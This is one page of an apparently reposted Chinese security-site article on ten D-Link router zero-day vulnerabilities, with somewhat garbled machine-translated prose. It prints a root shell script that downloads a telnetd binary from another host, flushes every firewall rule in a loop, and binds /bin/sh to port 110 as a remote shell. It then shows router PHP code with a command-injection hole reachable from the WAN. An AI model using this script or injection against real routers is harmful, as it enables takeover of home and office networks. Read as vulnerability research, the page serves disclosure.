欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

D-link十个漏洞0Day研究(附上详细过程)

来源:本站整理 作者:佚名 时间:2017-09-13 TAG: 我要投稿
-rw-rw-rw-    1 root     root          394 Jan  1 00:00 lld2d.conf
-rw-r--r--    1 root     root          199 Jan  1 00:00 hosts
drwxr-xr-x   16 root     root          241 Jan 20  2017 ..
drwxr-xr-x   14 root     root            0 Jan  1 00:00 .
# cat re
#!/bin/sh
wget -O /var/telnetd-dhcpd-wan http://10.254.239.1/dlink-telnetd
chmod 777 /var/telnetd-dhcpd-wan
(for i in 0 1 2 3; do # win races against legit iptables rules
iptables -F       
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
sleep 10
done ) &
/var/telnetd-dhcpd-wan -l /bin/sh -p 110 &
#
另有一些WAN RCEs,起首第一个便是 /etc/services/INET/inet_ipv4.php存在破绽漏洞bug
$udhcpc_helper = “/var/servd/”.$inf.”-udhcpc.sh”;
101行以后存在敕令注入破绽漏洞bug
 99     fwrite(w,$udhcpc_helper,
100                 '#!/bin/sh\n'.
101                 'echo [$0]: $1 $interface $ip $subnet $router $lease $domain $scope $winstype $wins $sixrd_prefix $sixrd_prefixlen $sixrd_msklen $sixrd_bripaddr ... > /dev/console\n'.
102                 'phpsh '.$hlper.' ACTION=$1'.
103                         ' INF='.$inf.
104                         ' INET='.$inet.
105                         ' MTU='.$mtu.
106                         ' INTERFACE=$interface'.
107                         ' IP=$ip'.
108                         ' SUBNET=$subnet'.
109                         ' BROADCAST=$broadcast'.
110                         ' LEASE=$lease'.
111                         ' "DOMAIN=$domain"'.
112                         ' "ROUTER=$router"'.
113                         ' "DNS='.$dns.'$dns"'.
114                         ' "CLSSTROUT=$clsstrout"'.
115                         ' "MSCLSSTROUT=$msclsstrout"'.
116                         ' "SSTROUT=$sstrout"'.
117                         ' "SCOPE=$scope"'.
118                         ' "WINSTYPE=$winstype"'.
119                         ' "WINS=$wins"'.
120                         ' "SIXRDPFX=$sixrd_prefix"'.

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载